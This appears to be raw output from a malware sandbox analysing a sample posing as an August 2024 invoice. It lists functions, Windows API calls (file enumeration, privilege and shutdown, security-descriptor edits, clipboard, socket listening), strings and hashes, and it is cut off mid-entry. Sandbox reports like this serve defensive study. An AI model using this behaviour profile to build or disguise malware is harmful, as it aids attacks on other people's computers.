                                                          • __swprintf.LIBCMT ref: 00478A1D
                                                          • __swprintf.LIBCMT ref: 00478A4B
                                                          • __swprintf.LIBCMT ref: 00478A79
                                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                          • __swprintf.LIBCMT ref: 00478AA7
                                                          • __swprintf.LIBCMT ref: 00478AD5
                                                          • __swprintf.LIBCMT ref: 00478B03
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                          • API String ID: 999945258-2428617273
                                                          • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                          • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                          • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                          • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                          APIs
                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                          • __wsplitpath.LIBCMT ref: 00403492
                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                          • _wcscpy.LIBCMT ref: 004034A7
                                                          • _wcscat.LIBCMT ref: 004034BC
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                          • _wcscpy.LIBCMT ref: 004035A0
                                                          • _wcslen.LIBCMT ref: 00403623
                                                          • _wcslen.LIBCMT ref: 0040367D
                                                          Strings
                                                          • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                          • _, xrefs: 0040371C
                                                          • Unterminated string, xrefs: 00428348
                                                          • Error opening the file, xrefs: 00428231
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                          • API String ID: 3393021363-188983378
                                                          • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                          • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                          • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                          • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                          • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                          • FindClose.KERNEL32(00000000), ref: 00431B20
                                                          • FindClose.KERNEL32(00000000), ref: 00431B34
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                          • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                          • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                          • String ID: *.*
                                                          • API String ID: 1409584000-438819550
                                                          • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                          • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                          • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                          • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                          • __swprintf.LIBCMT ref: 00431C2E
                                                          • _wcslen.LIBCMT ref: 00431C3A
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                          • String ID: :$\$\??\%s
                                                          • API String ID: 2192556992-3457252023
                                                          • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                          • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                          • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                          • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                          • __swprintf.LIBCMT ref: 004722B9
                                                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                          • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                          • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                          • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                          • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                          • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                          • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                          • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: FolderPath$LocalTime__swprintf
                                                          • String ID: %.3d
                                                          • API String ID: 3337348382-986655627
                                                          • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                          • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                          • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                          • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                          • FindClose.KERNEL32(00000000), ref: 0044291C
                                                          • FindClose.KERNEL32(00000000), ref: 00442930
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                          • FindClose.KERNEL32(00000000), ref: 004429D4
                                                            • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                          • FindClose.KERNEL32(00000000), ref: 004429E2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                          • String ID: *.*
                                                          • API String ID: 2640511053-438819550
                                                          • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                          • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                          • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                          • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                          • GetLastError.KERNEL32 ref: 00433414
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                          • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                          • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 2938487562-3733053543
                                                          • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                          • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                          • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                          • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                          APIs
                                                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                            • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                            • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                          • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                          • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                          • CopySid.ADVAPI32(00000000), ref: 00446271
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                          • String ID:
                                                          • API String ID: 1255039815-0
                                                          • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                          • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                          • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                          • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                          APIs
                                                          • __swprintf.LIBCMT ref: 00433073
                                                          • __swprintf.LIBCMT ref: 00433085
                                                          • __wcsicoll.LIBCMT ref: 00433092
                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                          • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                          • LockResource.KERNEL32(00000000), ref: 004330CA
                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                          • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                          • LockResource.KERNEL32(?), ref: 00433120
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                          • String ID:
                                                          • API String ID: 1158019794-0
                                                          • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                          • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                          • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                          • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                          • String ID:
                                                          • API String ID: 1737998785-0
                                                          • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                          • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                          • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                          • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                          • GetLastError.KERNEL32 ref: 0045D6BF
                                                          • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                          • API String ID: 4194297153-14809454
                                                          • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                          • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                          • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                          • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_strncmp
                                                          • String ID: @oH$\$^$h
                                                          • API String ID: 2175499884-3701065813
                                                          • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                          • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                                                          • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                          • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                          • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
